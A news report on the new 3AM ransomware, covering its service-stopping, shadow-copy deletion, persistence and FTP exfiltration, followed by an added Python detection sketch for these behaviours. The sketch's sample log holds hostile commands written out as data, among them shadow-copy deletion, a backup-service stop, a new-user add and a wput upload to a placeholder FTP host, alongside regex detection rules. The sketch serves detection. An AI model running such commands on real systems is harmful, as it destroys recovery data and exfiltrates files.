A new ransomware strain called 3AM has been discovered after a threat actor used it in an attack that failed to deploy LockBit ransomware on a target network.
Symantec's Threat Hunter Team, part of Broadcom, says that attacks using 3AM ransomware are rare. The threat actors managed to deploy the ransomware to three computers on the target organisation's network, but it was blocked on two of those three machines. 3AM ransomware extortion follows the common pattern of stealing data before encrypting it and dropping a ransom note that threatens to sell the stolen information unless the attacker is paid.
3AM is written in Rust and appears unrelated to any known ransomware family, making it an entirely new malware family.
Before the encryption process, the ransomware attempts to stop multiple services running on the infected system belonging to security and backup products from vendors such as Veeam, Acronis, Ivanti, McAfee, and Symantec. Once encryption completes, it attempts to delete Volume Shadow Copy Service (VSS) snapshots so they cannot be used for recovery.
The malware appends the extension .threeamtime to the filenames of encrypted files. The researchers have yet to determine whether the threat actors behind 3AM have any connection with known cybercrime groups.
The attackers used the post-exploitation tool Cobalt Strike and then attempted to run reconnaissance commands (such as whoami, netstat, quser, and net share) in preparation for lateral movement. The exact ingress route employed in the attack is unclear.
"They also added a new user for persistence and used the Wput tool to exfiltrate the victims' files to their own FTP server," Symantec noted.
The ransomware is a 64-bit executable that carries a list of commands used to stop applications that perform backups, as well as security software. The malware only encrypts files matching predefined criteria.
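The behaviours reported above (service stops for named backup and security vendors, VSS deletion, the .threeamtime extension, a new user for persistence, Wput-based FTP exfiltration, and the listed reconnaissance commands) translate directly into endpoint detection logic. The following Python sketch is an added example, not code from Symantec or the article; every log line, hostname, user, service name and IP address in it is constructed, and the correlation threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample telemetry in the form host|user|kind|detail (kind is proc or file).
SAMPLE_LOG = """\
host01|SYSTEM|proc|net stop VeeamBackupSvc
host01|SYSTEM|proc|vssadmin delete shadows /all /quiet
host01|SYSTEM|file|C:\\finance\\q3.xlsx.threeamtime
host02|admin|proc|net user svc_tmp /add
host02|admin|proc|wput C:\\staging\\docs.zip ftp://203.0.113.10/in/
host03|jdoe|proc|whoami
host03|jdoe|proc|winword.exe C:\\users\\jdoe\\report.docx
"""

# Each rule is (name, event kind, pattern) derived from the behaviours reported above.
RULES = [
    ("recon_cmd", "proc", re.compile(r"^(whoami|netstat|quser|net\s+share)\b", re.I)),
    ("stop_backup_or_av", "proc",
     re.compile(r"\b(net\s+stop|sc\s+stop|taskkill)\b.*\b(veeam|acronis|ivanti|mcafee|symantec)", re.I)),
    ("vss_delete", "proc", re.compile(r"\bvssadmin\b.*delete\s+shadows", re.I)),
    ("persist_new_user", "proc", re.compile(r"\bnet\s+user\s+\S+.*\s/add\b", re.I)),
    ("ftp_exfil_wput", "proc", re.compile(r"\bwput\b.*ftp://", re.I)),
    ("threeam_extension", "file", re.compile(r"\.threeamtime$", re.I)),
]

def match_events(log_text):
    """Return {host: set of rule names} for every event that matches a rule."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        host, _user, kind, detail = line.split("|", 3)
        for name, rule_kind, pattern in RULES:
            if kind == rule_kind and pattern.search(detail):
                hits[host].add(name)
    return dict(hits)

def escalate(hits, min_distinct=2):
    """Hosts on which at least min_distinct different behaviours fired. A lone
    whoami is routine noise; service stops plus VSS deletion on one host is not."""
    return sorted(h for h, names in hits.items() if len(names) >= min_distinct)

if __name__ == "__main__":
    found = match_events(SAMPLE_LOG)
    for host in sorted(found):
        print(host, sorted(found[host]))
    print("escalate:", escalate(found))
```

In a real deployment the same rules would run over Sysmon or EDR process-creation and file-write events rather than a pipe-separated string, and the vendor list would be tuned to the products actually installed.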
"Ransomware affiliates have become increasingly independent from ransomware operators, and this is not the first time Symantec has seen an attacker attempt to deploy two different kinds of ransomware in a single attack," Symantec said.
"New ransomware families appear frequently, and most disappear quickly or never manage to gain significant traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may be of interest to attackers and could be seen again in the future."